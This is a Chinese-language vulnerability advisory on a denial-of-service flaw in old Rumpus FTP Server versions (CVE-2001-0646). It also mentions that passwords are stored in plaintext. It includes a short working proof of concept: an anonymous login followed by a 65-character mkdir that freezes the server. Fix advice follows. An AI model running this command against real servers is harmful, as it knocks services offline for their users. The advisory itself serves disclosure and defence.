Rumpus FTP 服务器拒绝服务漏洞

　　受影响系统：

　　Rumpus FTP Server v1.3.3, 2.0 dev 3

　　+ MacOS 8.6, 9.1

　　可能还有更早的版本

　　不受影响系统：

　　Rumpus FTP Server v1.3.4

　　描述：

　　BUGTRAQ ID: 2716,2718

　　CVE(CAN) ID: CVE-2001-0646

　　如果试图创建一个目录名长达 65 个字符的目录，Rumpus FTP 服务器和机器将僵住不动。

　　点击 Force quit 按钮强行退出并不起效果。另外，象大多数 macintosh 程序一样，

　　Rumpus FTP 服务器把口令以明文方式存放在prefs 文件夹中名为 Rumpus User Database

　　的文件中。厂商支持说新版的将对口令进行加密。

　　<* 来源：Jass Seljamaa (jass@isp.ee) *>

　　测试方法：

　　警 告

　　以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负!

　　ftp 192.168.0.1

　　user anonymous

　　pass an@nymo.us

　　mkdir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

　　建议：

　　临时解决办法：

　　NSFOCUS建议您把版本升级到 v1.3.4。

　　厂商补丁：

　　请与生产厂商 Maxum(http://maxum.com) 联系，

　　版本 v1.3.4 中解决了这个问题。